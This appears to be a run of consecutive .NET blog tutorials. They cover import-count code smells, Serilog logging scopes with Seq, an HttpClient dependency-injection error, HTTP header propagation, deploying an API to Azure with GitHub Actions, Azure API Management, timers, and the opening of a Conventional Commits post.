Actually, this article is not about a tip for writing cleaner code: it aims at pointing out a code smell.
Of course, once you find this code smell in your code, you can act to eliminate it and, as a consequence, end up with cleaner code.
The code smell is easy to identify: open your classes and have a look at the imports list (in C#, the using on top of the file).
A real example of too many imports
Here’s a real-life example (I censored the names, of course):
using MyCompany.CMS.Data;
using MyCompany.CMS.Modules;
using MyCompany.CMS.Rendering;
using MyCompany.Witch.Distribution;
using MyCompany.Witch.Distribution.Elements;
using MyCompany.Witch.Distribution.Entities;
using Microsoft.Extensions.Logging;
using Newtonsoft.Json;
using Newtonsoft.Json.Serialization;
using MyProject.Controllers.VideoPlayer.v1.DataSource;
using MyProject.Controllers.VideoPlayer.v1.Vod;
using MyProject.Core;
using MyProject.Helpers.Common;
using MyProject.Helpers.DataExplorer;
using MyProject.Helpers.Entities;
using MyProject.Helpers.Extensions;
using MyProject.Helpers.Metadata;
using MyProject.Helpers.Roofline;
using MyProject.ModelsEntities;
using MyProject.Models.ViewEntities.Tags;
using MyProject.Modules.EditorialDetail.Core;
using MyProject.Modules.VideoPlayer.Models;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Linq;
namespace MyProject.Modules.Video
Sounds familiar?
If we exclude the imports necessary to use some C# functionalities
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Linq;
We have lots of dependencies on external modules.
This means that if something changes in one of the classes that are part of those namespaces, we may end up with code that is difficult to update.
Also, guess what comes with all those imports? A constructor with too many parameters (in fact, this class has 11 dependencies injected in the constructor) and code that is too long and difficult to understand (in fact, this class has 500+ lines).
A solution? Refactor your project in order to minimize scattering those dependencies.
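For instance, you can group related collaborators behind a single facade, so that consumers depend on one interface instead of many. Here's a minimal sketch with purely hypothetical names (none of these types come from the project above):
// Hypothetical "before": three separate collaborators, three imports, three constructor parameters.
public interface IMetadataReader { string ReadTitle(int videoId); }
public interface ITagReader { string[] ReadTags(int videoId); }
public interface IThumbnailReader { string ReadThumbnailUrl(int videoId); }

// Hypothetical "after": a single facade hides the details,
// so the consuming class needs one import and one constructor parameter.
public interface IVideoDetailsProvider
{
    (string Title, string[] Tags, string ThumbnailUrl) GetDetails(int videoId);
}

public class VideoDetailsProvider : IVideoDetailsProvider
{
    private readonly IMetadataReader _metadata;
    private readonly ITagReader _tags;
    private readonly IThumbnailReader _thumbnails;

    public VideoDetailsProvider(IMetadataReader metadata, ITagReader tags, IThumbnailReader thumbnails)
    {
        _metadata = metadata;
        _tags = tags;
        _thumbnails = thumbnails;
    }

    public (string Title, string[] Tags, string ThumbnailUrl) GetDetails(int videoId)
        => (_metadata.ReadTitle(videoId), _tags.ReadTags(videoId), _thumbnails.ReadThumbnailUrl(videoId));
}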
Wrapping up
Having all those imports (in C# we use the keyword using) is a good indicator that your code does too many things. You should focus on minimizing those imports without cheating (like using global imports).
Logs are important. Properly structured logs can be the key to resolving some critical issues. With Serilog’s Scopes, you can enrich your logs with info about the context where they happened.
Even though it’s not one of the first things we usually set up when creating a new application, logging is a real game-changer in the long run.
When an error occurs, proper logging gives us more info about the context where it happened, so that we can easily identify the root cause.
In this article, we will use Scopes, one of the functionalities of Serilog, to create better logs for our .NET 6 application. In particular, we’re going to create a .NET 6 API application in the form of Minimal APIs.
We will also use Seq, just to show you the final result.
In short, Serilog is an open-source .NET library for logging. One of its best features is that messages are in the form of a template (called Structured Logs), and you can enrich the logs with values calculated automatically, such as the method name or exception details.
To add Serilog to your application, you simply have to run dotnet add package Serilog.AspNetCore.
Since we’re using Minimal APIs, we don’t have the StartUp file anymore; instead, we will need to add it to the Program.cs file:
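The original snippet isn't shown here, but a minimal setup with Serilog.AspNetCore in a .NET 6 Program.cs usually looks something like this (Console sink assumed):
using Serilog;

var builder = WebApplication.CreateBuilder(args);

// Route every ILogger<T> call through Serilog
builder.Host.UseSerilog((context, loggerConfiguration) =>
    loggerConfiguration.WriteTo.Console());

var app = builder.Build();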
As you can see, we’re injecting an ILogger<ItemsRepository>: specifying the related class automatically adds some more context to the logs that we will generate.
Installing Seq and adding it as a Sink
Seq is a logging platform that is a perfect fit for Serilog logs. If you don’t have it already installed, head to their download page and install it locally (you can even install it as a Docker container 🤩).
In the installation wizard, you can select the HTTP port that will expose its UI. Once everything is in place, you can open that page on your localhost and see a page like this:
On this page, we will see all the logs we write.
But wait! ⚠ We still have to add Seq as a sink for Serilog.
A sink is nothing but a destination for the logs. When using .NET APIs we can define our sinks both on the appsettings.json file and on the Program.cs file. We will use the second approach.
First of all, you will need to install a NuGet package to add Seq as a sink: dotnet add package Serilog.Sinks.Seq.
Then, you have to update the Serilog definition we’ve seen before by adding a .WriteTo.Seq instruction:
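The updated snippet isn't shown here, but with the Seq sink installed it boils down to one extra call (assuming Seq listens on localhost on its default port, 5341):
builder.Host.UseSerilog((context, loggerConfiguration) =>
    loggerConfiguration
        .WriteTo.Console()
        .WriteTo.Seq("http://localhost:5341")); // use the port you chose during the Seq installation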
Notice that we've also specified the port that exposes our Seq instance.
Now, every time we log something, we will see our logs both on the Console and on Seq.
How to add scopes
The time has come: we can finally learn how to add Scopes using Serilog!
Setting up the example
For this example, I’ve created a simple controller, ItemsController, which exposes two endpoints: Get and Add. With these two endpoints, we are able to add and retrieve items stored in an in-memory collection.
This class has 2 main dependencies: IItemsRepository and IUsersItemsRepository. Each of these interfaces has its own concrete class, each with a private logger injected in the constructor:
public ItemsRepository(ILogger<ItemsRepository> logger)
{
_logger = logger;
}
and, similarly
public UsersItemRepository(ILogger<UsersItemRepository> logger)
{
_logger = logger;
}
How do those classes use their own _logger instances?
For example, the UsersItemRepository class exposes an AddItem method that adds a specific item to the list of items already possessed by a specific user.
public void AddItem(string username, Item item)
{
    if (!_usersItems.ContainsKey(username))
    {
        _usersItems.Add(username, new List<Item>());
        _logger.LogInformation("User was missing from the list. Just added");
    }
    _usersItems[username].Add(item);
    _logger.LogInformation("Added item to the user's catalogue");
}
We are logging some messages, such as “User was missing from the list. Just added”.
Something similar happens in the ItemsRepository class, where we have a GetItem method that returns the required item if it exists, and null otherwise.
[HttpPost(Name = "AddItems")]
public IActionResult Add(string userName, int itemId)
{
var item = _itemsRepository.GetItem(itemId);
if (item == null)
{
_logger.LogWarning("Item does not exist");
return NotFound();
}
_usersItemsRepository.AddItem(userName, item);
return Ok(item);
}
Ok then, we’re ready to run the application and see the result.
When I call that endpoint by passing “davide” as userName and “1” as itemId, we can see these logs:
We can see the 3 log messages, but they are unrelated to each other. In fact, if we expand the logs to see the actual values we've logged, we can see that only the "Retrieving item 1" log has some information about the item ID we want to associate with the user.
Using BeginScope with Serilog
Finally, it’s time to define the Scope.
It’s as easy as adding a simple using statement; see how I added the scope to the Add method in the Controller:
[HttpPost(Name = "AddItems")]
public IActionResult Add(string userName, int itemId)
{
using (_logger.BeginScope("Adding item {ItemId} for user {UserName}", itemId, userName))
{
var item = _itemsRepository.GetItem(itemId);
if (item == null)
{
_logger.LogWarning("Item does not exist");
return NotFound();
}
_usersItemsRepository.AddItem(userName, item);
return Ok(item);
}
}
Here’s the key!
using (_logger.BeginScope("Adding item {ItemId} for user {UserName}", itemId, userName))
With this single instruction, we are actually performing 2 operations:
we are adding a Scope to each message – “Adding item 1 for user davide”
we are adding ItemId and UserName to each log entry that falls in this block, in every method in the method chain.
Let’s run the application again, and we will see this result:
So, now you can use these new properties to get some info about the context of when this log happened, and you can use the ItemId and UserName fields to search for other related logs.
You can also nest scopes, of course.
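A minimal sketch of what nesting could look like, assuming a hypothetical orderId and attemptNumber and an injected _logger:
using (_logger.BeginScope("Processing order {OrderId}", orderId))
{
    using (_logger.BeginScope("Payment attempt {AttemptNumber}", attemptNumber))
    {
        // entries written here carry both OrderId and AttemptNumber
        _logger.LogInformation("Charging the customer");
    }
}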
Why scopes instead of Correlation ID?
You might be thinking
Why can’t I just use correlation IDs?
Well, the answer is pretty simple: correlation IDs are meant to correlate different logs in a specific request, and, often, across services. You generally use Correlation IDs that represent a specific call to your API and act as a Request ID.
For sure, that can be useful. But, sometimes, not enough.
Using scopes you can also “correlate” distinct HTTP requests that have something in common.
If I call the AddItem endpoint twice, I can filter both by UserName and by ItemId and see all the related logs across distinct HTTP calls.
Let’s see a real example: I have called the endpoint with different values
id=1, username=“davide”
id=1, username=“luigi”
id=2, username=“luigi”
Since the scope references both properties, we can filter by UserName and discover that Luigi has added both Item 1 and Item 2.
At the same time, we can filter by ItemId and discover that the item with id = 2 has been added only once.
Ok, then, in the end, Scopes or Correlation IDs? The answer is simple:
Then, you might want to deep dive into Serilog's BeginScope. Here's a neat article by Nicholas Blumhardt. Also, have a look at the comments: you'll find interesting points to consider.
A suitable constructor for type ‘X’ could not be located. What a strange error message! Luckily it’s easy to solve.
A few days ago I was preparing the demo for a new article. The demo included a class with an IHttpClientFactory service injected into the constructor. Nothing more.
Then, running the application (well, actually, executing the code), this error popped out:
System.InvalidOperationException: A suitable constructor for type ‘X’ could not be located. Ensure the type is concrete and all parameters of a public constructor are either registered as services or passed as arguments. Also ensure no extraneous arguments are provided.
How to solve it? It’s easy. But first, let me show you what I did in the wrong version.
Setting up the wrong example
For this example, I created an elementary project.
It’s a .NET 7 API project, with only one controller, GenderController, which calls another service defined in the IGenderizeService interface.
IGenderizeService is implemented by a class, GenderizeService, which is the one that fails to load and, therefore, causes the exception to be thrown. The class calls an external endpoint, parses the result, and then returns it to the caller:
public class GenderizeService : IGenderizeService
{
    private readonly IHttpClientFactory _httpClientFactory;

    public GenderizeService(IHttpClientFactory httpClientFactory)
    {
        _httpClientFactory = httpClientFactory;
    }

    public async Task<GenderProbability> GetGenderProbabiliy(string name)
    {
        var httpClient = _httpClientFactory.CreateClient();
        var response = await httpClient.GetAsync($"?name={name}");
        var result = await response.Content.ReadFromJsonAsync<GenderProbability>();
        return result;
    }
}
Finally, I've defined the services in the Program class, and then I've specified the base URL for the HttpClient instance generated in the GenderizeService class:
// some code
builder.Services.AddScoped<IGenderizeService, GenderizeService>();
builder.Services.AddHttpClient<IGenderizeService, GenderizeService>(
client => client.BaseAddress = new Uri("https://api.genderize.io/")
);
var app = builder.Build();
// some more code
That’s it! Can you spot the error?
2 ways to solve the error
The error was quite simple, but it took me a while to spot:
In the constructor I was injecting an IHttpClientFactory:
public GenderizeService(IHttpClientFactory httpClientFactory)
while in the host definition I was declaring an HttpClient for a specific class (the AddHttpClient<IGenderizeService, GenderizeService> call shown above).
We no longer need to call _httpClientFactory.CreateClient because the injected instance of HttpClient is already customized with the settings we’ve defined at Startup.
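One way to solve it, matching the typed-client registration, is to inject HttpClient directly instead of IHttpClientFactory. A sketch of the adjusted class, under that assumption:
public class GenderizeService : IGenderizeService
{
    private readonly HttpClient _httpClient;

    // The HttpClient built by AddHttpClient<IGenderizeService, GenderizeService>
    // is injected here, already configured with its BaseAddress.
    public GenderizeService(HttpClient httpClient)
    {
        _httpClient = httpClient;
    }

    public async Task<GenderProbability> GetGenderProbabiliy(string name)
    {
        var response = await _httpClient.GetAsync($"?name={name}");
        return await response.Content.ReadFromJsonAsync<GenderProbability>();
    }
}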
Further readings
I’ve briefly talked about HttpClientFactory in one article of my C# tips series:
Propagating HTTP Headers can be useful, especially when dealing with Correlation IDs. It’s time to customize our HttpClients!
Imagine this: you have a system made up of different applications that communicate via HTTP. There’s some sort of entry point, exposed to the clients, that orchestrates the calls to the other applications. How do you correlate those requests?
A good idea is to use a Correlation ID: one common approach for HTTP-based systems is passing a value to the “public” endpoint using HTTP headers; that value will be passed to all the other systems involved in that operation to say that “hey, these incoming requests in the internal systems happened because of THAT SPECIFIC request in the public endpoint”. Of course, it’s more complex than this, but you got the idea.
Now. How can we propagate an HTTP Header in .NET? I found this solution on GitHub, provided by no less than David Fowler. In this article, I’m gonna dissect his code to see how he built this solution.
Important update: there’s a NuGet package that implements these functionalities: Microsoft.AspNetCore.HeaderPropagation. Consider this article as an excuse to understand what happens behind the scenes of an HTTP call, and use it to learn how to customize and extend those functionalities. Here’s how to integrate that package.
Just interested in the C# methods?
As I said, I’m not reinventing anything new: the source code I’m using for this article is available on GitHub (see link above), but still, I’ll paste the code here, for simplicity.
First of all, we have two extension methods that add some custom functionalities to the IServiceCollection.
It’s quite easy: if you want to propagate the my-correlation-id header for all the HttpClients created in your application, you just have to add this line to your Startup method.
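The line itself didn't survive here; based on the options class described below, it presumably looks like this:
services.AddHeaderPropagation(options => options.HeaderNames.Add("my-correlation-id"));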
This class lies in the middle of the HTTP Request pipeline. It can extend the functionalities of HTTP Clients because it inherits from System.Net.Http.DelegatingHandler.
If you recall from a previous article, the SendAsync method is the real core of any HTTP call performed using .NET’s HttpClients, and here we’re enriching that method by propagating some HTTP headers.
protected override Task<HttpResponseMessage> SendAsync(HttpRequestMessage request, System.Threading.CancellationToken cancellationToken)
{
if (_contextAccessor.HttpContext != null)
{
foreach (var headerName in _options.HeaderNames)
{
// Get the incoming header value
var headerValue = _contextAccessor.HttpContext.Request.Headers[headerName];
if (StringValues.IsNullOrEmpty(headerValue))
{
continue;
}
request.Headers.TryAddWithoutValidation(headerName, (string[])headerValue);
}
}
return base.SendAsync(request, cancellationToken);
}
By using _contextAccessor we can access the current HTTP Context. From there, we retrieve the current HTTP headers, check if one of them must be propagated (by looking up _options.HeaderNames), and finally, we add the header to the outgoing HTTP call by using TryAddWithoutValidation.
Notice that we’ve used `TryAddWithoutValidation` instead of `Add`: in this way, we can use whichever HTTP header key we want without worrying about invalid names (such as the ones with a new line in it). Invalid header names will simply be ignored, as opposed to the Add method that will throw an exception.
Finally, we continue with the HTTP call by executing `base.SendAsync`, passing the `HttpRequestMessage` object now enriched with additional headers.
Using HttpMessageHandlerBuilder to configure how HttpClients must be built
The Microsoft.Extensions.Http.IHttpMessageHandlerBuilderFilter interface allows you to apply some custom configurations to the HttpMessageHandlerBuilder right before the HttpMessageHandler object is built.
The Configure method allows you to customize how the HttpMessageHandler will be built: we are adding a new instance of the HeaderPropagationMessageHandler class we’ve seen before to the current HttpMessageHandlerBuilder’s AdditionalHandlers collection. All the handlers registered in the list will then be used to build the HttpMessageHandler object we’ll use to send and receive requests.
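The class isn't pasted here, but from the description above it presumably looks like this sketch (constructor parameters assumed from how the handler uses its fields; it relies on the Microsoft.Extensions.Http and Microsoft.Extensions.Options namespaces):
internal class HeaderPropagationMessageHandlerBuilderFilter : IHttpMessageHandlerBuilderFilter
{
    private readonly HeaderPropagationOptions _options;
    private readonly IHttpContextAccessor _contextAccessor;

    public HeaderPropagationMessageHandlerBuilderFilter(IOptions<HeaderPropagationOptions> options, IHttpContextAccessor contextAccessor)
    {
        _options = options.Value;
        _contextAccessor = contextAccessor;
    }

    public Action<HttpMessageHandlerBuilder> Configure(Action<HttpMessageHandlerBuilder> next)
    {
        return builder =>
        {
            // Register our DelegatingHandler for every HttpClient the factory builds
            builder.AdditionalHandlers.Add(new HeaderPropagationMessageHandler(_options, _contextAccessor));
            next(builder);
        };
    }
}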
Here, we’re gonna extend the IServiceCollection with those functionalities. At first, we’re adding AddHttpContextAccessor, which allows us to access the current HTTP Context (the one we’ve used in the HeaderPropagationMessageHandler class).
Then, services.ConfigureAll(configure) registers an HeaderPropagationOptions that will be used by HeaderPropagationMessageHandlerBuilderFilter. Without that line, we won’t be able to specify the names of the headers to be propagated.
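Put together, the extension method presumably looks something like this sketch (TryAddEnumerable and ServiceDescriptor come from Microsoft.Extensions.DependencyInjection):
public static class HeaderPropagationExtensions
{
    public static IServiceCollection AddHeaderPropagation(this IServiceCollection services, Action<HeaderPropagationOptions> configure)
    {
        services.AddHttpContextAccessor();
        services.ConfigureAll(configure);

        // registers the filter so that the HttpClientFactory pipeline picks it up
        services.TryAddEnumerable(ServiceDescriptor.Singleton<IHttpMessageHandlerBuilderFilter, HeaderPropagationMessageHandlerBuilderFilter>());

        return services;
    }
}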
Honestly, I haven’t understood it thoroughly: I thought that it allows us to use more than one class implementing IHttpMessageHandlerBuilderFilter, but apparently if we create a sibling class and add them both using Add, everything works the same. If you know what this line means, drop a comment below! 👇
Wherever you access the ServiceCollection object (may it be in the Startup or in the Program class), you can propagate HTTP headers for every HttpClient by using
Yes, AddHeaderPropagation is the method we’ve seen in the previous paragraph!
Seeing it in action
Now we have all the pieces in place.
It’s time to run it 😎
To fully understand it, I strongly suggest forking this repository I’ve created and running it locally, placing some breakpoints here and there.
As a recap: in the Program class, I’ve added these lines to create a named HttpClient specifying its BaseAddress property. Then I’ve added the HeaderPropagation as we’ve seen before.
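Those lines aren't shown here; presumably they look something like this (the base address below is just a placeholder):
builder.Services.AddHttpClient("items", client =>
{
    // placeholder URL: point it to the downstream API that should receive the propagated header
    client.BaseAddress = new Uri("https://localhost:5002/");
});

builder.Services.AddHeaderPropagation(options => options.HeaderNames.Add("my-correlation-id"));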
There’s also a simple Controller that acts as an entry point and that, using an HttpClient, sends data to another endpoint (the one defined in the previous snippet).
[HttpPost]
public async Task<IActionResult> PostAsync([FromQuery] string value)
{
var item = new Item(value);
var httpClient = _httpClientFactory.CreateClient("items");
await httpClient.PostAsJsonAsync("/", item);
return NoContent();
}
What happens at start-up time
When a .NET application starts up, the Main method in the Program class acts as an entry point and registers all the dependencies and configurations required.
We will then call builder.Services.AddHeaderPropagation, which is the method present in the HeaderPropagationExtensions class.
All the configurations are then set, but no actual operations are being executed.
The application then starts normally, waiting for incoming requests.
What happens at runtime
Now, when we call the PostAsync method by passing an HTTP header such as my-correlation-id:123, things get interesting.
The first operation is
var httpClient = _httpClientFactory.CreateClient("items");
While creating the HttpClient, the engine is calling all the registered IHttpMessageHandlerBuilderFilter and calling their Configure method. So, you’ll see the execution moving to HeaderPropagationMessageHandlerBuilderFilter’s Configure.
Of course, you’re also executing the HeaderPropagationMessageHandler constructor.
The HttpClient is now ready: when we call httpClient.PostAsJsonAsync("/", item) we’re also executing all the registered DelegatingHandler instances, such as our HeaderPropagationMessageHandler. In particular, we’re executing the SendAsync method and adding the required HTTP Headers to the outgoing HTTP calls.
We will then see the same HTTP Header on the destination endpoint.
If you're not sure about what extension methods are (and you cannot answer this question: how does inheritance work with extension methods?), then you can have a look at this article:
Building APIs with .NET is easy. Deploying them on Azure is easy too, with GitHub Actions!
With Continuous Delivery (CD), you can deploy your code in a fast-paced and stable way.
To deploy applications, you’ll need workflows that run and automate the process. In that way, you don’t have to perform repetitive tasks and the whole process becomes less error-prone.
In this article, we will learn how to implement CD pipelines using GitHub Actions. In particular, we will focus on the case of a .NET API application that will be deployed on Azure.
Create a .NET API project
Since the focus of this article is on the deployment part, we won't create complex APIs. Just a simple Hello World is enough.
To do that, we’re gonna use dotnet Minimal API – a way to create APIs without scaffolding lots of files and configurations.
Our API, the BooksAPI, has a single endpoint: /, the root, which simply returns "Hello World!".
All our code is stored in the Program file:
var builder = WebApplication.CreateBuilder(args);
var app = builder.Build();
app.UseHttpsRedirection();
app.MapGet("/", () => "Hello World!");
app.Run();
Nothing fancy: run the application locally, and navigate to the root. You will see the Hello World message.
Lastly, put your code on GitHub: initialize a repository and publish it on GitHub – it can either be a public or a private repository.
Create an App Service on Azure
Now, to deploy an application, we need to define its destination. We’re going to deploy it on Azure, so you need an Azure account before moving on.
Open the Azure Portal, navigate to the App Service section, and create a new one.
Configure it as you wish, and then proceed until you have it up and running.
Once everything is done, you should have something like this:
Now the application is ready to be used: we now need to deploy our code here.
Generate the GitHub Action YAML file for deploying .NET APIs on Azure
It’s time to create our Continuous Delivery pipeline.
Luckily, GitHub already provides lots of templates for GitHub Actions. We will need one specific for our .NET APIs.
On GitHub, navigate to your repository, head to the Actions menu, and select New workflow.
You will see several predefined actions that allow you to do stuff with your repository. We are now interested in the one called “Deploy a .NET Core app to an Azure Web App”:
Clicking on “Configure” you will see a template. Read carefully the instructions, as they will guide you to the correct configuration of the GitHub action.
In particular, you will have to update the environment variables specified in this section:
env:
  AZURE_WEBAPP_NAME: your-app-name    # set this to the name of your Azure Web App
  AZURE_WEBAPP_PACKAGE_PATH: "."      # set this to the path to your web app project, defaults to the repository root
  DOTNET_VERSION: "5"                 # set this to the .NET Core version to use
Clearly, AZURE_WEBAPP_NAME must match the name you’ve defined on Azure, while DOTNET_VERSION must match the version you’re using to create your dotnet APIs.
For my specific project, I’ve replaced that section with
env:
  AZURE_WEBAPP_NAME: BooksAPI<myName> # set this to the name of your Azure Web App
  AZURE_WEBAPP_PACKAGE_PATH: "."      # set this to the path to your web app project, defaults to the repository root
  DOTNET_VERSION: "6.0"               # set this to the .NET Core version to use
🟧 DOTNET_VERSION also requires the minor version of dotnet. Setting 6 will not work: you need to specify 6.0. 🟧
Now you can save your YAML file in your repository: it will be saved under ./.github/workflows.
So, as a reference, here’s the full YAML file I’m using to deploy my APIs:
name: Build and deploy ASP.Net Core app to an Azure Web App

env:
  AZURE_WEBAPP_NAME: BooksAPI<myName>
  AZURE_WEBAPP_PACKAGE_PATH: "."
  DOTNET_VERSION: "6.0"

on:
  push:
    branches: ["master"]
  workflow_dispatch:

permissions:
  contents: read

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v3

      - name: Set up .NET Core
        uses: actions/setup-dotnet@v2
        with:
          dotnet-version: ${{ env.DOTNET_VERSION }}

      - name: Set up dependency caching for faster builds
        uses: actions/cache@v3
        with:
          path: ~/.nuget/packages
          key: ${{ runner.os }}-nuget-${{ hashFiles('**/packages.lock.json') }}
          restore-keys: |
            ${{ runner.os }}-nuget-

      - name: Build with dotnet
        run: dotnet build --configuration Release

      - name: dotnet publish
        run: dotnet publish -c Release -o ${{env.DOTNET_ROOT}}/myapp

      - name: Upload artifact for deployment job
        uses: actions/upload-artifact@v3
        with:
          name: .net-app
          path: ${{env.DOTNET_ROOT}}/myapp

  deploy:
    permissions:
      contents: none
    runs-on: ubuntu-latest
    needs: build
    environment:
      name: "Development"
      url: ${{ steps.deploy-to-webapp.outputs.webapp-url }}

    steps:
      - name: Download artifact from build job
        uses: actions/download-artifact@v3
        with:
          name: .net-app

      - name: Deploy to Azure Web App
        id: deploy-to-webapp
        uses: azure/webapps-deploy@v2
        with:
          app-name: ${{ env.AZURE_WEBAPP_NAME }}
          publish-profile: ${{ secrets.AZURE_WEBAPP_PUBLISH_PROFILE }}
          package: ${{ env.AZURE_WEBAPP_PACKAGE_PATH }}
As you can see, we have 2 distinct steps: build and deploy.
In the build phase, we check out our code, restore the NuGet dependencies, build the project, pack it and store the final result as an artifact.
In the deploy step, we retrieve the newly created artifact and publish it on Azure.
Store the Publish profile as GitHub Secret
As you can see in the instructions of the workflow file, you have to
Create a secret in your repository named AZURE_WEBAPP_PUBLISH_PROFILE, paste the publish profile contents as the value of the secret.
That Create a secret in your repository named AZURE_WEBAPP_PUBLISH_PROFILE statement was not clear to me: I thought you had to create that key within your .NET project. Turns out you can create secrets related to repositories on GitHub (so, it’s language-agnostic).
A Publish profile is a file that contains information and settings used to deploy applications to Azure. It’s nothing but an XML file that lists the possible ways to deploy your application, such as FTP, Web Deploy, Zip Deploy, and so on.
We have to get our publish profile and save it into GitHub secrets.
To retrieve the Publish profile, head to the Azure App Service page and click Get publish profile to download the file.
Now, get back to GitHub and head to Settings > Security > Secrets > Actions.
Here you can create a new secret related to your repository.
Create a new one, name it AZURE_WEBAPP_PUBLISH_PROFILE, and paste the content of the Publish profile file you’ve just downloaded.
You will then see something like this:
Notice that the secret name must be AZURE_WEBAPP_PUBLISH_PROFILE. That constraint is set because we are accessing the Publish profile by key:
- name: Deploy to Azure Web App
  id: deploy-to-webapp
  uses: azure/webapps-deploy@v2
  with:
    app-name: ${{ env.AZURE_WEBAPP_NAME }}
    publish-profile: ${{ secrets.AZURE_WEBAPP_PUBLISH_PROFILE }}
    package: ${{ env.AZURE_WEBAPP_PACKAGE_PATH }}
In particular, notice the publish-profile: ${{ secrets.AZURE_WEBAPP_PUBLISH_PROFILE }} part.
Clearly, the two names must match: nothing stops you from changing the name of the secret in both the YAML file and the GitHub Secret page.
Final result
It’s time to see the final result.
Update the application code (I’ve slightly modified the Hello world message), and push your changes to GitHub.
Under the Actions tab, you will see your CD pipeline run.
Once it’s completed, you can head to your application root and see the final result.
Further readings
Automating repetitive tasks allows you to perform more actions with fewer errors. Generally speaking, the more stuff you can automate, the better.
My own blog heavily relies on automation: scaffolding content, tracking ideas, and publishing online…
If you want to peek at what I do, here are my little secrets:
In this article, we’ve only built and deployed our application. We can do more: run tests and keep track of code coverage. If you want to learn how you can do it using Azure DevOps, here we go:
I have to admit that I struggled a lot in setting up the CD pipeline. I was using the one proposed by default on Visual Studio – but it didn’t work.
Using the template found on GitHub worked almost instantly – I just had to figure out what they meant by repository secrets.
Now we have everything in place. Since the workflow is stored in a text file within my repository, if I have to create and deploy a new API project I can simply do that by copying that file and fixing the references.
In a microservices architecture, an API Gateway hides your real endpoints. We will create one using Azure API Management
If you’re building an application that exposes several services you might not want to expose them on different hosts. Consumers will have a hard time configuring their application with all the different hostnames, and you will be forced to maintain the same URLs even if you need to move to other platforms or, for instance, you want to transform a REST endpoint into an Azure Function.
In this case, you should mask the real endpoints beneath a facade: maybe… an API Gateway? 🙂
In this article, we will learn how to configure Azure API Management (from now on: APIM) service to create an API Gateway and “hide” our real services.
Demo: publish .NET API services and locate the OpenAPI definition
For the sake of this article, we will work with 2 API services: BooksService and VideosService.
They are both .NET 6 APIs, deployed on Azure using GitHub Actions (using the steps I described in a previous article).
Both services expose their Swagger pages and a bunch of endpoints that we're gonna hide behind Azure APIM.
How to create Azure API Management (APIM) Service from Azure Portal
Now, we want to hide their real endpoints. The clients will then only know about the existence of the API Gateway, and not of the two separate API services:
It’s time to create our APIM resource.👷♂️
Head to the Azure Portal, and create a new API Management instance. I suggest reading the short overview of the functionalities provided by Azure API Management services as listed in the screenshot below.
The wizard will ask you for some info, such as the resource name, the region, and an email used to send communications (honestly speaking, I still haven’t figured out why they’re asking for your email).
Fill in all the fields, pick your preferred pricing tier (mine is Developer: it doesn’t have an SLA and is quite cheap), and then proceed with the service creation.
After several minutes (it took 50 minutes – fifty!💢 – to scaffold my instance), you will have your instance ready to be used.
We are now ready to add our APIs and expose them to our clients.
How to add APIs to Azure API Management using Swagger definition (OpenAPI)
As we’ve seen in a previous article, Swagger creates a JSON file that describes the operations available in your APIs, as well as the object structures accepted as input and returned as output.
Let me use as an example the Books API: once that API project is deployed on the cloud (it’s not mandatory to use Azure: it will work the same using other cloud vendors), you will see the Swagger UI and the related JSON definition.
We have 3 endpoints, /, /echo, and /books; those endpoints are described in the swagger.json file linked in the Swagger page; put that link aside: we will use it soon.
Finally, we can add our Books APIs to our Azure Management API Service! Head to the resource on Azure, locate the APIs menu item on the left panel, and create a new API definition using OpenAPI (which is the standard used by Swagger to create its UI).
You will see a form that allows you to create new resources from OpenAPI specifications.
Paste here the link to the swagger.json file you located before, populate the required fields and, if you want, add a prefix to identify these endpoints: I chose MyBooks.
You will then see your APIs appear in the panel shown below. It is composed of different parts:
The list of services exposed. In the screenshot below, BooksAPI, Echo API, and VideosAPI;
The list of endpoints exposed for each service: here, BooksAPI exposes endpoints at /, /echo, and /books;
A list of policies that are applied to the inbound requests before hitting the real endpoint;
The real endpoint used when calling the facade exposed by APIM;
A list of policies applied to the outbound requests after the origin has processed the requests.
For now, we will ignore both Inbound and Outbound processing, as they will be the topic of a future article.
Consuming APIs exposed on the API Gateway
We’re ready to go! Head back to the Azure API Management service dashboard and locate the URL of the API Gateway under Custom domains > Gateway URL.
This will be the root URL that our clients will use.
We can then access Books API and Videos API both on the Origin and the Gateway (we’re doing it just for demonstrating that things are working; clients will only use the APIs exposed by the API Gateway).
The Videos API maintains the exact same structure, mapping the endpoints as they are defined in Origin.
On the contrary, to access the Books APIs we have to access the /mybooks path (because we defined it a few steps ago when we imported the BooksAPI from OpenAPI definition: it’s the API Url Suffix field), as shown below:
Further readings
As usual, a bunch of interesting readings 📚
In this article, we've only scratched the surface of Azure API Management. There's a lot more – and you can read about it on the Microsoft Docs website:
To integrate Azure APIM, we used two simple dotNET 6 Web APIs deployed on Azure. If you wanna know how to set up GitHub Actions to build and deploy dotNET APIs, I recently published an article on that topic.
This can be just the beginning of a long journey; APIM allows you to highly customize your API Gateway by defining API access by user role, creating API documentation using custom templates and themes, and a lot of different stuff.
There may be times when you need to process a specific task on a timely basis, such as polling an endpoint to look for updates or refreshing a Refresh Token.
If you need infinite processing, you can pick two roads: the obvious one or the better one.
For instance, you can use an infinite loop and put a Sleep command to delay the execution of the next task:
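The snippet isn't shown here, but the "obvious" road is something along these lines (DoSomething is a hypothetical placeholder for the periodic task):
while (true)
{
    DoSomething();                          // the task to repeat
    System.Threading.Thread.Sleep(5000);    // block the thread for 5 seconds before the next run
}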
The better alternative is to use a Timer, such as System.Timers.Timer: its constructor accepts an interval as input (a double value that represents the interval in milliseconds), whose default value is 100.
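A minimal sketch, assuming System.Timers.Timer (which matches the constructor and IDisposable behavior described here); DoSomething is again a hypothetical synchronous task:
var timer = new System.Timers.Timer(5000);      // interval in milliseconds
timer.Elapsed += (sender, e) => DoSomething();  // runs every time the interval elapses
timer.AutoReset = true;                         // keep raising Elapsed, not just once
timer.Start();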
This class implements IDisposable: if you’re using it as a dependency of another component that must be Disposed, don’t forget to call Dispose on that Timer.
Note: use this only for synchronous tasks: there are other kinds of Timers that you can use for asynchronous operations, such as PeriodicTimer, which also can be stopped by canceling a CancellationToken.
Using Conventional Commits you can define a set of rules useful for writing meaningful commit messages. Using NPM. Yes, in a dotNET application!
Setting teams conventions is a crucial step to have the project prepared to live long and prosper 🖖
A good way to set some clarity is by enforcing rules on GIT commit messages: you can require devs to specify the reason behind some code changes so that you can understand the history and the reason for each of those commits. Also, if you have well-crafted commit messages, Pull Requests become easier to understand, leading to better code.
Conventional Commits help you set such rules, and help you level up your commit history. In this article, we will learn how to add Conventional Commits in a .NET application.
Conventional Commits
